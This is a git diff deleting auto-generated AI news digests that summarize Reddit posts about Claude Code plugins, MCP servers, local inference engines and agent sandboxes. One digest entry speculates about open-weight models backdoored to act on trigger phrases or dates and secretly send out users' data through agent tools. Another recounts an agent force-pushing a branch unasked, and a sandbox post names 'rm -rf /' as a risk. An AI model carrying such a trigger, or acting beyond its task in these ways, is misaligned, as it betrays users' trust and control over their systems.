lip-synchronization, full-body temporal stability, and robust long-video generation with strict identity consistency. * 🌟 **Stylized Domain Generalization**: Robustly generalizes to anime, animals, and complex real-world conditions such as multi-person interactio… - ---- - -## [Claude records demo videos for me now](https://reddit.com/r/ClaudeAI/comments/1tmkee4/claude_records_demo_videos_for_me_now/) -*Reddit r/ClaudeAI* | 24/05/2026 | Score: 0.62 -Tags: open_source, tool_update - -> I hate recording demo videos, so I made an open source skill for it: [https://github.com/MobAI-App/desktop-recorder-skill](https://github.com/MobAI-App/desktop-recorder-skill) Now I can give Claude a prompt like: Record a short demo of this app flow And it handles the annoying parts for me: preparing the app state, clicking through the flow, recording, adding cursor/click effects and captions, then exporting the video. So instead of spending time setting everything up and recording the same demo manually, I can let Claude do it while I work on something else. It also has Remotion integration, so Claude can generate more polished and editable videos from the recording, not just raw screen captures. The video attached to this post is the result of the skill itself. Also working on the same idea for mobile apps: [https://github.com/MobAI-App/mobile-recorder-skill](https://github.com/MobAI-App/mobile-recorder-skill) - ---- - -## [hipEngine: Fast Native Qwen 3.6 Inference for RDNA3 (Strix Halo, 7900 XTX)](https://reddit.com/r/LocalLLaMA/comments/1tmq4s6/hipengine_fast_native_qwen_36_inference_for_rdna3/) -*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 -Tags: open_source - -> A few weeks ago, after finishing [FastDMS](https://www.reddit.com/r/LocalLLaMA/comments/1t3vlrx/fastdms_64x_kvcache_compression_running_faster/), I started toying around writing some RDNA3 kernels again to see how fast I could get Qwen 3.6 MoE running. It turned out well enough, so over the past couple weeks, I turned those experiments into [hipEngine](https://github.com/shisa-ai/hipEngine), a new open source (AGPLv3) ROCm-native local LLM inference engine. It's Python based, but with no heavy PyTorch dependency. All the hot-path is HIP/C++, making liberal use of AMD native libs like hipBLASLt, hipGraph, AOTriton, etc. ### gfx1100 (Radeon RX 7900 XTX / Radeon Pro W7900) The initial implementation has Qwen 3.6 (MoE and dense) running competitively with llama.cpp, with the [ParoQuant](https://github.com/shisa-ai/paroquant) (which I've also ported to be ROCm compatible) 4.68bpw having better c=1 prefill ("prompt processing") at every tested context length, from 512-128K on gfx1100 (W7900/7900 XTX): ### Prefill tok/s | Workload | hipEngine PARO | hipEngine GGUF Q4_K_S | llama.cpp HIP | llama.cpp Vulkan | | --- | ---: | ---: | ---: | ---: | | 512/128 | **2718.497** | 2258.847 | 2436.04… - ---- - -## [MergeNB: An intuitive merge conflict resolver built for Jupyter notebooks in VS Code [P]](https://reddit.com/r/MachineLearning/comments/1tmq1eb/mergenb_an_intuitive_merge_conflict_resolver/) -*Reddit r/MachineLearning* | 24/05/2026 | Score: 1.00 -Tags: developer_tool - -> I used to work heavily with Jupyter Notebooks + git + VS Code in a collaborative research setting and found nbdime to be somewhat buggy/a hassle to work with in general. So, in typical side project fashion ([relevant xkcd](https://xkcd.com/1319/)) I've been working on MergeNB quite a bit over the last 6 months or so. It's (currently only) a VS Code extension with a web UI, and has a few cool improvements over other alternatives, which I outlined in the README/docs site. I'd be over the moon if this actually gets used by people, and would love a star if it's interesting. See [https://github.com/Avni2000/MergeNB](http://github.com/Avni2000/MergeNB). I've also been working on a static documentation site here: [https://avni2000.github.io/MergeNB/docs](https://avni2000.github.io/MergeNB/docs) I'm planning on working on it a lot more over the summer and properly fleshing out a few of the ideas I had (including making it a git mergetool as well as a VS Code extension), so if you'd like to contribute, feel free to raise an issue or shoot me a message/email :) - ---- - diff --git a/data/digest-2026-05-25.md b/data/digest-2026-05-25.md deleted file mode 100644 index 2052675..0000000 --- a/data/digest-2026-05-25.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-25** | 15 stories | Auto-generated from 588 archived stories - ---- - -## [I made a local-first MCP tutorial repo with node-llama-cpp and a custom agent loop](https://reddit.com/r/LocalLLaMA/comments/1tn1jjy/i_made_a_localfirst_mcp_tutorial_repo_with/) -*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 -Tags: api_update, mcp, developer_tool, cli_tool, tool_update - -> I just published a repo called MCP from Scratch that teaches the Model Context Protocol by building it step by step in plain Node.js. Most of the repo is about understanding MCP itself, but the later modules may be relevant here: I added a local-first setup using `node-llama-cpp`, GGUF models, MCP sampling, and a custom plan -> act -> observe agent loop. So the repo goes from: * raw JSON-RPC and stdio transport * to a working MCP server with tools/resources/prompts * to local model integration * to an agent loop that uses MCP tools with a local GGUF model There’s also an optional LangChain example, but the main path is intentionally minimal and tries to make the underlying mechanics obvious. Key points: * plain Node.js, minimal abstractions * designed as a learning repo, not a production SDK * uses shared local GGUF models for the later modules * built for people who want to understand what MCP tooling is actually doing under the hood Repo: [https://github.com/pguso/mcp-from-scratch](https://github.com/pguso/mcp-from-scratch) Would especially love feedback from people here on the local inference side: * model choice * whether the agent loop examples feel useful or too toy-ish - ---- - -## [I stress-tested Kimi K2.6 against Claude Opus 4.7 on a quick coding-agent task](https://reddit.com/r/ClaudeAI/comments/1tn9fpq/i_stresstested_kimi_k26_against_claude_opus_47_on/) -*Reddit r/ClaudeAI* | 25/05/2026 | Score: 1.00 -Tags: api_update, open_source, tool_update, agent_tool - -> I tested Claude Opus 4.7 and Kimi K2.6 on the same coding agent task i.e. build an AI Fix Runner that takes a broken repo, runs its tests, identifies the failure, applies a patch, reruns the test, and exposes the final diff/logs through an API and UI. The goal was not to benchmark syntax completion or simple repo edits. I wanted to test model behavior on a less familiar integration path: shifting execution from local processes into remote sandboxes. I used Tensorlake specifically because the sandbox API is newer and integration-heavy. This made the test more about whether the model could reason through unfamiliar infra and produce a working implementation. Setup: * Claude Opus 4.7 through Claude Code * Kimi K2.6 through OpenCode via OpenRouter Pricing context: * Claude Opus 4.7: $5/M input, $25/M output * Kimi K2.6: $0.95/M input ($0.16 cached input), $4/M output So, what made it interesting is if Kimi's lower cost can handle a crazy workflow. To be clear, comparing Kimi K2.6 directly with Opus 4.7 is not completely fair. The model classes, pricing, and expected capability levels are very different. I mainly wanted to see how far an open model could get on the same task at a fract… - ---- - -## [Workbench Launches Open Source BullMQ Dashboard For Node Backends](https://x.com/pontusab/status/2058588422001029549) -*Aligned News (Scoble)* | 25/05/2026 | Score: 1.00 -Tags: product_launch, open_source, tool_update - -> Workbench launched as an open-source BullMQ dashboard with flows, metrics, schedulers, and search for Node backends. - ---- - -## [Ditched GitHub Copilot yearly subscription. What's the best way to run Claude nowadays?](https://reddit.com/r/ClaudeAI/comments/1tnl23a/ditched_github_copilot_yearly_subscription_whats/) -*Reddit r/ClaudeAI* | 25/05/2026 | Score: 0.94 -Tags: api_update, developer_tool, cli_tool - -> Hey everyone, I recently cancelled my yearly GitHub Copilot subscription. My old workflow was simple: I used the GitHub Copilot extension in VS Code, but I swapped the backend model to Sonnet / Opus and relied heavily on the `/plan` command to code. I absolutely loved it and I would like that exact flow back. My plan was to just go full Bring Your Own Key (BYOK) inside VS Code using an API key and pay per token for Sonnet or Opus. However, I’m seeing all this hype around CLI tools, and it has me second-guessing my setup. I’m completely open to trying new workflows if they are a massive upgrade, but honestly, I’d be much happier just staying in my cozy VS Code environment if the math makes sense. so my questions are: 1. Is a flat Claude subscription actually cheaper than an API key for heavy coding? In my old copilot plan I believe just once I used all my tokens per month. 2. How bad is the token bleed if I stick to BYOK? I heard with CLI you make some markdown files and things get cheaper / faster. Can you do that with BYOK as well? thanks for any advice! - ---- - -## [I built a meme-y social feed for programmers that lives inside Claude Code (and Cursor, and Copilot CLI)](https://reddit.com/r/ClaudeAI/comments/1tnlji5/i_built_a_memey_social_feed_for_programmers_that/) -*Reddit r/ClaudeAI* | 25/05/2026 | Score: 1.00 -Tags: developer_tool, cli_tool - -> I spend hours every day in Claude Code, but I started feeling weirdly isolated. So I built a tiny social network that lives inside it. WAYD ("What Are You Doing?") is a Claude Code skill. You type `/wayd` and either post a short "vibe" about your coding day or scroll a random feed of what other developers are losing their minds over. React with emojis, drop a one-line reply, get back to work. The whole thing runs on GitHub Issues as the silent backend. No server, no database, no signup, just your existing `gh` CLI. You never see issues, JSON, or `gh` commands; the skill orchestrates everything in the background. It feels like a tiny social app inside the terminal. 8 vibe-tags to pick from when you post: 🤡 cursed-code, 🪦 rip-me, 🫠 brain-melt, 🧙 dark-arts, 🔥 hot-take, 💭 shower-thought, 🤔 existential, ☕ procrastinating. Each is a mood, not a topic. Write up to 1000 chars, publish under your real GitHub handle, scroll a random feed of strangers doing the same. **Install on Claude Code**: claude plugin marketplace add ferdinandobons/wayd claude plugin install wayd@wayd Other install methods + screenshots: [https://github.com/ferdinandobons/wayd](https://github.com/ferdinandobons… - ---- - -## [Is AI inference platform really that saturated now? [D]](https://reddit.com/r/MachineLearning/comments/1tngk7p/is_ai_inference_platform_really_that_saturated/) -*Reddit r/MachineLearning* | 25/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> I’m thinking of expanding an on-device inference SDk into a full blown AI inference platform and seeing more and more inference platform popping out. Been talking with a VC from Seattle/NY. Is this space really that saturated? - ---- - -## [Reconstructing the agent methodology: Decoupling decision-making and execution - open source [P]](https://reddit.com/r/MachineLearning/comments/1tnfxsc/reconstructing_the_agent_methodology_decoupling/) -*Reddit r/MachineLearning* | 25/05/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> I’ve been thinking about a problem in current agent systems: Most agents are becoming very good at execution, but the decision layer before execution is still unclear. Coding agents, research agents, tool loops, sandboxes, workflows, and harnesses are all improving quickly. Once a human gives an intent, agents can often do a lot of useful work. But the higher-level question is still usually left to the user: What should happen next, and why? I’ve been exploring this idea through an open-source project called Spice. The simplest way to describe it is: Spice is a decision layer above agents. It is not trying to replace execution agents. Tools like Claude Code, Codex, Hermes, or other agents can still do the actual work. Instead, Spice sits before execution and tries to make the decision process explicit: - what was observed - what options were considered - why one option was selected - what trade-offs were rejected - whether execution needs approval - what happened afterward - how that outcome should affect the next decision The current runtime is still early, but it can already be installed, configured with an LLM provider, run in the terminal, inspect Decision Cards, and hand off… - ---- - -## [I’m building an open-source decision layer above AI agents [P]](https://reddit.com/r/MachineLearning/comments/1tndi8y/im_building_an_opensource_decision_layer_above_ai/) -*Reddit r/MachineLearning* | 25/05/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> Hi everyone, I’m Jia, the creator of Spice. I’ve been working on an open-source project called Spice. The simplest way to describe it is: Spice is a decision layer above agents. Most agent systems today are very focused on execution, They are getting better at doing tasks after a human gives them an intent. But the higher-level question is still usually left to the user: What should happen next, and why? That is the layer I want Spice to explore. Spice is not trying to replace execution agents. Tools like Claude Code, Codex, Hermes, or other agents can still do the actual work. Instead, Spice sits before execution and tries to make the decision process explicit: - what was observed - what options were considered - why one option was selected - what trade-offs were rejected - what happened afterward - how that outcome should affect the next decision The current runtime is still early, but you can already install it, set up an LLM provider, run it in the terminal, inspect Decision Cards, and hand off approved execution to external agents. My goal is to make agent behavior less of a black box. Instead of only seeing the final result of an agent task, I want to preserve the reasoning… - ---- - -## [I built a computer use sandbox framework for codex on headless linux. GPU passthrough, computer use, and sudo access for codex all work. It's the perfect dev sandbox to allow full auto work while minimizing the "rm -rf /" risk](https://reddit.com/r/LocalLLaMA/comments/1tn3i55/i_built_a_computer_use_sandbox_framework_for/) -*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 -Tags: developer_tool, agent_tool - -> I've been working with agents for months now, and I haven't found a sandbox environment that "just works" so I built it! My requirements were as follows: 1. Agent is unable to destroy my host OS but able to install software and run sudo commands 2. Agent is able to browse the web autonomously and validate the UI it creates 3. GPU access works (even on DGX spark which cant pass through to 4. Docker works 5. Persistent environment I can setup once, log into my internet accounts I want the agent to access, copy in my .env files, install custom software etc. 6. Support multiple parallel browser use / development sessions concurrently 7. Easily log into each agent's desktop to view the work it's doing or manually setup the agent environment via a desktop interface The inspiration for this project is wanting a sandbox I can let the agent run free in, while limiting the damage it can do. I want it to be able to browse the web, do automated AI research on my GPU, test my docker containers in a sandbox, develop my webapp full-auto, or whatever other task I need it to do while still being safely in a sandbox and unable to wipe or modify my host system. I felt like either I had to go full YO… - ---- - -## [We added W8A8 activation quantization to MLX — prefill went from 2.84s to 2.52s on M5 Pro](https://reddit.com/r/LocalLLaMA/comments/1tn2p61/we_added_w8a8_activation_quantization_to_mlx/) -*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Hey, I work on inference tooling at Mininglamp AI. We needed faster prefill for a 4B VLM running on Apple Silicon. Problem was MLX only does weight-only quant — activations stay FP16 the whole way through. So we wrote Cider, a small SDK that adds W8A8 activation quant on top of MLX. Numbers on M5 Pro (64GB, 307 GB/s), 4516 token context: |Quantization|Prefill|Decode| |:-|:-|:-| |W8A16 (MLX)|2.839s|80.1 tok/s| |W8A8 (Cider)|2.519s|79.5 tok/s| Under the hood it's custom Metal kernels we registered as MLX primitives. At M=4096 the per-channel path runs 1.84x faster than W8A16 on the same shape. Not just for our model btw — works with anything that runs through MLX. One catch: INT8 TensorOps only compile on M5 and above. pip install on M4 still works, just falls back to the regular path. Repo: [https://github.com/Mininglamp-AI/cider](https://github.com/Mininglamp-AI/cider) Edit: adding accuracy numbers since it came up. Wikitext2 PPL on Qwen3-8B: FP16 9.73, W8A16 9.71, W8A8 per-channel 9.76. Llama3-8B: FP16 6.14, W8A16 6.15, W8A8 per-channel 6.27. Per-group gs=64 keeps it tighter if precision matters more than speed for your use case. - ---- - -## [xAI releases Grok Build 0.1.219, fixing kitty terminal layout issues and paste-related data loss](https://www.digg.com/ai/hlcz47lw) -*Digg AI* | Score: 1.00 -Tags: product_launch, cli_tool - ---- - -## [Wrote a custom C++ engine for MiniCPM-V 4.6 on Orange Pi AIPro (Ascend 310B) to bypass framework overhead](https://reddit.com/r/LocalLLaMA/comments/1tmy4g9/wrote_a_custom_c_engine_for_minicpmv_46_on_orange/) -*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> Hey everyone, just wanted to share a project I've been hacking on for the last few weeks. I managed to build a from-scratch C++ inference engine to run MiniCPM-V 4.6 entirely on the Orange Pi AIPro (the budget board with the Ascend 310B NPU, costs around $149 for 20 TOPS INT8 / 10 TFLOPS FP16). If you want to check out the custom ops, build scripts, or the Gradio web UI, the repository is open source on GitHub at [github.com/lvyufeng/minicpm-v-4.6-orangepi](http://github.com/lvyufeng/minicpm-v-4.6-orangepi) https://preview.redd.it/upfsqb0jm73h1.png?width=1655&format=png&auto=webp&s=1e80185171fa6db651d81e20d717b3a05791614c If you've ever tried deploying local LLMs or VLMs on this specific hardware, you probably know that dealing with the standard framework stack can be a massive pain, especially if you want to get any decent performance on the edge. To get around this, I skipped the heavy frameworks and went low-level. Both the text generation and the SigLIP vision tower run natively on the NPU inside a single C++ subprocess. There is absolutely zero torch\_npu dependency on the hot path. Python is only used on the cold path for CPU-side tokenization and image preproces… - ---- - -## [I shipped a windows desktop app for running local LLMs with a button that turns your "no thats wrong" into actual LoRA training data](https://reddit.com/r/LocalLLaMA/comments/1tmxp03/i_shipped_a_windows_desktop_app_for_running_local/) -*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 -Tags: api_update, cli_tool - -> i built a local AI desktop app and just shipped it. windows only. called SEELS. dropping it here cause if anyones gonna find the cracks its you guys. the thing i actually wanted to make wasnt another ollama wrapper. what bugged me is every local model id run would say something dumb and id sit there going "no thats not what i meant". then id close the chat and the model never knew, never learned. so the whole hook of SEELS is theres a Teach button on every reply where you write what it should have said. those corrections pile up into a jsonl corpus, and when you have enough you click Train and it actually kicks off a PEFT LoRA run on your base. no notebook, no python, no terminal. just chat, correct, train. over time the adapters stack up and it becomes your model not theirs. trained a tiny 0.6B helper from scratch on like 110 hand written examples so theres something that runs on CPU out of the box. not replacing your daily 35B obviously but it answers questions about how to use SEELS itself which was the point. rest of standard (free, forever, not a trial): bring any GGUF, voice mode with whisper STT and piper TTS both local no API keys, hardware dashboard so you can stop guessi… - ---- - -## [Could Open Models be trained to secretly go rogue?](https://reddit.com/r/LocalLLaMA/comments/1tmpqrv/could_open_models_be_trained_to_secretly_go_rogue/) -*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> I was discussing with some other folks how safe is to use open weights models from China and the topic of "trojan horse" came up. We know that, at least with current architecture, models can't run code on their own. They are entirely dependent on tools and harnesses. We also know that a local run model can't have any kind of remote "switch" that would change its behavior or inject a different prompt. But would there be any other ways to "execute order 66" 😄 ? Could a lab, for instance, train a model that would change its behavior upon reading certain trigger phrases or perhaps at a specific date? They would then secretly gather sensitive info and send it somewhere else without user consent. Obviously the model would have to be running in an harness capable of such tool-use (which is quite common with openclaws, hermes, etc). Thoughts? - ---- - -## [I made a Chrome extension that lets me use ChatGPT from any webpage without an API key, so its compeletly free.](https://reddit.com/r/ChatGPT/comments/1tmznuc/i_made_a_chrome_extension_that_lets_me_use/) -*Reddit r/ChatGPT* | 25/05/2026 | Score: 0.94 -Tags: api_update, developer_tool - -> I’ve been building a Chrome extension called **Dichrome**. The basic idea is simple: it lets you use ChatGPT from a sidebar while you’re on any webpage, without needing an API key or paying for a separate AI sidebar subscription. For example, in the screenshots I was on my GitHub repo page. I clicked the screenshot button in the Dichrome sidebar, typed “Can you see the attached image?”, and hit send. Dichrome then sent the prompt and screenshot to ChatGPT through the normal ChatGPT UI. I didn’t have to open ChatGPT myself, switch tabs, upload the image manually, or copy anything over. The response came back inside the sidebar, and the actual ChatGPT conversation was also saved inside my **Dichrome project folder**. That part matters to me because I don’t want random sidebar chats cluttering my normal ChatGPT history. Anything started from the extension gets routed into its own project folder instead. The workflow is basically: 1. Stay on whatever webpage you’re using 2. Click screenshot or send selected text 3. Type your prompt in the sidebar 4. Dichrome sends it to ChatGPT through the normal UI 5. The answer shows up back in the sidebar 6. The chat gets saved in the Dichrome proj… - ---- - diff --git a/data/digest-2026-05-26.md b/data/digest-2026-05-26.md deleted file mode 100644 index 4983559..0000000 --- a/data/digest-2026-05-26.md +++ /dev/null @@ -1,121 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-26** | 15 stories | Auto-generated from 541 archived stories - ---- - -## [open-source plug-in for claude code: declare what it can't do in yaml, enforced at the tool boundary](https://reddit.com/r/ClaudeAI/comments/1tofpzr/opensource_plugin_for_claude_code_declare_what_it/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 -Tags: api_update, mcp, open_source, developer_tool - -> last week claude code force-pushed on me. nothing in the prompt said it could, it just inferred "make sure the branch is clean" loosely. wanted a hard rule i could plug in so this couldn't happen again. so i built sponsio, an open-source plug-in for claude code that gates tool calls at the boundary. apache 2.0. hooks in via the claude agent sdk (or the mcp layer if your tools go through there). write contracts in yaml using assume-guarantee structure ("if the agent calls X, the trace must satisfy Y"). when claude code tries to call a tool, sponsio checks first. allow, block, or escalate to human. guarantee clauses are temporal logic over the action trace, so you can also express "tests must pass before commit", "no two writes to the same file in a session", or "max N file edits per session", not just deny-lists. why deterministic: prompts give statistical behavior, not guarantees. once context fills, even obvious rules drift. hard guarantees have to live outside the probabilistic part of the system. how claude code helped build it: i sketched the LTL evaluator AST, claude filled in each operator's trace-evaluation case. framework adapters are mostly claude generations from interfa… - ---- - -## [Built an MCP server so Claude can generate music, images, and video natively. One config block.](https://reddit.com/r/ClaudeAI/comments/1toh1pr/built_an_mcp_server_so_claude_can_generate_music/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 -Tags: api_update, mcp, cli_tool - -> I've been using Claude Code daily for the last few months and kept hitting the same wall: I'd ask Claude to produce a creative artifact (a song, a cover, a short video) and end up writing the API glue myself, then pasting results back into the chat. Felt backwards. So I built an MCP server around my AI generation platform. It exposes three tools to Claude: \- aw\_generate\_music (Suno, full songs with lyrics or instrumental) \- aw\_generate\_image (Z-Image Turbo, Wan 2.5 Spicy, Grok Imagine Quality, GPT-Image-2, Nano Banana 2, and others) \- aw\_generate\_video (Kling 3.0 Standard/Pro/4K T2V + I2V, Wan 2.2, Hailuo 02, Seedance, Grok video) One key. One credit pool. The agent picks the right model for the prompt. Install: npm install -g u/aetherwave-studio/mcp Claude Code config (\~/.config/claude/mcp.json or wherever yours lives): { "mcpServers": { "aetherwave": { "command": "npx", "args": \["-y", "@aetherwave-studio/mcp"\], "env": { "AW\_API\_KEY": "aw\_live\_YOUR\_KEY\_HERE" } } } } Restart Claude. Done. Prompts that work end-to-end without any additional setup: 1. "Generate a 60-second lo-fi track for a study playlist, then make me 3 album cover options in a retro Japanese prin… - ---- - -## [Small set of local MCP server installers for home Linux users](https://reddit.com/r/LocalLLaMA/comments/1to8y2i/small_set_of_local_mcp_server_installers_for_home/) -*Reddit r/LocalLLaMA* | 26/05/2026 | Score: 1.00 -Tags: api_update, mcp, open_source - -> Hi all, I have published a small open-source MCP server bundle called **MCP Basic Servers**: [https://github.com/mchowy-troll/mcp-basic-servers](https://github.com/mchowy-troll/mcp-basic-servers) It is a collection of simple Bash installer scripts for running local **MCP HTTP servers on Linux**. **The idea is simple: run one script, answer a few questions, get a working local MCP endpoint at \`/mcp\`.** This project is mainly for **beginner and intermediate Linux users** who want to experiment with MCP tools at home without manually setting up Python environments, systemd services, SQLite databases, or local web search from scratch. It is not meant to be an enterprise-grade or hardened production platform. It is intentionally simple, readable, and designed for local/home use. The first release includes six servers: * **web** — live web search and webpage fetching through local SearXNG * **files** — local workspace tools for text, CSV, Markdown and PDF * **memory** — local SQLite-based memory * **contacts** — local SQLite-based contacts * **wiki\_verifier** — Wikidata and Wikipedia context/verification tools * **weather** — weather tools using Open-Meteo Default ports are \`8001-80… - ---- - -## [Harbor v0.4.19 - vllm/sglang/llama.cpp launch codex/claude/pi/opencode](https://reddit.com/r/LocalLLaMA/comments/1to8t53/harbor_v0419_vllmsglangllamacpp_launch/) -*Reddit r/LocalLLaMA* | 26/05/2026 | Score: 1.00 -Tags: product_launch, cli_tool, agent_tool - -> I'm usually not posting about Harbor releases out of the respect for the community here, but I think v0.4.19 might save a lot of people some time. Harbor can now launch your local agentic coding tools with local inference backends. For example, to run pi + vllm: # model downloaded and configured harbor up vllm # Harbor knows that vllm is running and will use it harbor launch pi Additionally, `launch` can proxy requests through built-in optimising LLM gateway which automatically injects and resolves tools, such as web search, so you can add web search to an agent by just appending `--web` to the command and Harbor will pre-wire everything: harbor launch --web --model qwen3.5:4b --backend ik_llamacpp mi -p 'Find recent releases of agentic tools and write a two sentence overview' You can find many more details in the wiki here: [https://github.com/av/harbor/wiki/3.-Harbor-CLI-Reference#harbor-launch-launch-options---service-servicetool-args](https://github.com/av/harbor/wiki/3.-Harbor-CLI-Reference#harbor-launch-launch-options---service-servicetool-args) Thank you! - ---- - -## [This is insane.](https://reddit.com/r/ClaudeAI/comments/1to6zg8/this_is_insane/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 -Tags: api_update, mcp, open_source - -> Just installed an open source tool that wiped most of the tool-definition tokens out of my Claude Code context before any prompt. Same MCP servers. Same tools available. 8 servers, 142 tools across them. Before: the tool definitions ate 38k tokens of context every single turn. Cold start, my context bar was already orange and I hadn't typed anything. After: 4k. The Claude Code session sees three tools (`search_tools`, `invoke_tool`, `auth`) and dispatches everything else under the hood. When I ask for a thing, it ranks the catalog with BM25 in microseconds and surfaces the top 5. The part nobody's talking about: there's no LLM in the ranking loop. No embedding API to pay. No vector DB to host. It's keyword search over a flat projection of tool name + description, deterministic, offline. Apparently this was always going to be enough. It's [Ratel](https://github.com/ratel-ai/ratel). Open source. The install is `ratel mcp import` and it migrates your existing Claude Code MCP config in one command, with backups written automatically. Took me 90 seconds. Why is every "context layer" startup pitching me semantic embeddings and inference-time re-ranking when basic BM25 over tool definiti… - ---- - -## [Find where claude code burns your tokens](https://reddit.com/r/ClaudeAI/comments/1toagk7/find_where_claude_code_burns_your_tokens/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 0.86 -Tags: api_update, developer_tool, cli_tool - -> I started using claude code as a harness for a side project a few months ago, and the native OTLP exporter gives you metrics and event logs but not the full execution path you need to actually debug. Also, I needed to keep token usage under control too. So I built a package that installs a Stop hook in ~/.claude/settings.json. Claude Code runs this hook automatically every time a turn ends. The hook reads the new portion of the transcript, reconstructs the turn as opentelemetry spans, and posts them to latitude's OTLP endpoint. Install: npx -y @latitude-data/claude-code-telemetry install Works in CLI, desktop app, and IDE extensions. Disclosure: I work at Latitude. I did this for personal needs but now it’s integrated on the product. It's free, MIT-licensed, source is on GitHub. Happy to answer technical doubts - ---- - -## [Anyone else dread keeping web, Android, and iOS releases in sync?](https://reddit.com/r/ClaudeAI/comments/1tnr1vf/anyone_else_dread_keeping_web_android_and_ios/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 0.86 -Tags: product_launch, cli_tool, tool_update - -> I got tired of every “small update” turning into version bumps, patch notes, store metadata, web deploys, Android uploads, TestFlight builds, and one more iOS step I couldn’t even run locally because I don’t own a Mac. I have a game built with React + Vite + Matter.js + Capacitor. It’s live on web, Android, and iOS. I was getting worn down by the release chores: version bumps, build numbers, localized patch notes, store metadata, Capacitor syncs, signing, uploads, all the little steps that are easy to mess up and also ridiculously time consuming. Also, I don’t own a Mac, so I thought iOS was out of the question... until.... I wired the repo so Claude can take a normal request like: “ship the updates since our last version bump, browser, Android, and iOS TestFlight with release notes” then the Claude code gets to work with a repeatable path: \- bump the right versions/build numbers both in build and in game ui \- create patch notes for every supported language \- run lint/typecheck/build through \`npm run verify\` \- sync Capacitor after the web build \- build and upload iOS to TestFlight from GitHub Actions on a macOS runner \- build an Android AAB and upload it to Google Play \-… - ---- - -## [Claude makes documents into apps](https://reddit.com/r/ClaudeAI/comments/1toajqg/claude_makes_documents_into_apps/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 0.70 -Tags: open_source, tool_update, agent_tool - -> # Any document can become an app I’ve been working on an open-source document format and viewer called **Adaptive Markdown**. The basic idea is simple: A document should not have to stay static. It should be something a coding agent can extend, reshape, and turn into an interactive workspace. This is not just a canvas you edit with a chatbot. The bigger idea is that the document becomes both: 1. the source of truth 2. the programmable interface In other words, the document becomes a living app. You write notes, collect data, draft text, or import files. Then a coding agent can directly modify the document surface: add charts, create calculators, build filters, restyle sections, generate summaries, export views, or turn rough notes into an interactive tool. So instead of having: * a document * a spreadsheet * a dashboard * an app * a changelog * a separate AI chat about all of it You can have one living `.md` file that contains those layers together. # Example A fitness log might start as a plain Markdown journal. Then the agent adds charts. Then it pulls in device data. Then it adds weekly summaries, rolling averages, goal tracking, export options, and a dashboard view. The docume… - ---- - -## [Merge API launches Merge Gateway to help enterprises build custom model routers based on product-specific benchmarksIt prevents enterprise cost overruns from overusing frontier models](https://www.digg.com/ai/5nn022fp?rank=3) -*Digg AI* | Score: 1.00 -Tags: api_update, product_launch - ---- - -## [Merge API launches Merge Gateway to help enterprises build custom model routers based on product-specific benchmarks](https://www.digg.com/ai/5nn022fp) -*Digg AI* | Score: 1.00 -Tags: api_update, product_launch - ---- - -## [i benchmarked Anthropic's tool-search-tool head to head against our own MCP gateway on Opus 4.7. ours held up noticeably better](https://reddit.com/r/ClaudeAI/comments/1to7byy/i_benchmarked_anthropics_toolsearchtool_head_to/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> i'd been running Claude Code with a long list of MCP servers connected. Linear, Notion, GitHub, Slack, a few internal ones. and i was pretty confident that Opus 4.7 plus Claude Code's built in tool-search-tool would just absorb all of it. it mostly did. but i was still hitting \~20% context saturation way too often, before doing any actual work. tried Ratel (our own MCP gateway, we built it for exactly this problem) kind of out of curiosity. then we benchmarked it properly, head to head against Anthropic's own tool-search-tool, same model (Opus 4.7), realistic tool catalogs at 50 / 100 / 180 tools. at the 180 tool pool, measured against the full-catalog baseline: * Ratel: near parity on accuracy (about -1.7pp) and roughly -81% input tokens. * Anthropic's tool-search-tool: about -8.4pp accuracy. so somewhere around 5x the accuracy hit, same model, same catalog. the takeaway for me: a big context window and a built in tool search are not the same thing as a gateway thats actually optimised for the one job of deciding what enters context. repo plus the full benchmark, numbers and methodology, is here: [github.com/ratel-ai/ratel](http://github.com/ratel-ai/ratel) happy to be wrong on… - ---- - -## [I didn't want blind multi-agent orchestration or API rates, so I built atrium to keep me in the loop with my CLI agents.](https://reddit.com/r/ClaudeAI/comments/1to69z3/i_didnt_want_blind_multiagent_orchestration_or/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 -Tags: api_update, cli_tool - -> I'd been running multi-agent workflows for a while. Whether it was across multiple projects or on the same project. Brainstorming sessions, planning sessions, builds happening in worktrees, asking for Claude's opinion on new tires for my car cause it was closer to hand than Google. This felt really clunky in most of the tools I was using and when I started looking for alternatives, everything felt like it was trying to remove me from the equation and just run agents in the background. So, I built atrium. A macOS human-in-the-loop multi-agent workspace. The entire project was built with [the BMad Method](https://github.com/bmad-code-org/BMAD-METHOD?tab=readme-ov-file) and Claude Code (mostly Opus). It's over 60 BMad written epics in now and counting. atrium makes CLI agents first-class citizens within a versatile, tiling workspace. It wires up agents via hooks to the app to surface interactive activity cards, saves state comprehensively so everything resumes, provides a robust CLI that allows agents to completely drive the app, and gives me every tool I need to get the job done. Happy to answer any questions about it and would love to hear how y'all are handling multi-agent workflo… - ---- - -## [Just passed the new Claude Certified Architect - Foundations (CCA-F) exam with a 985/1000!](https://reddit.com/r/ClaudeAI/comments/1to0xfc/just_passed_the_new_claude_certified_architect/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 -Tags: api_update, tool_update - -> The original post was removed by Reddit Filters, so I made new one with same content. I just got my results back today and managed to snag the Early Adopter badge as well. Following up on my recent DP-600 certification, I really wanted to validate my architecture skills specifically on the Anthropic side. The exam 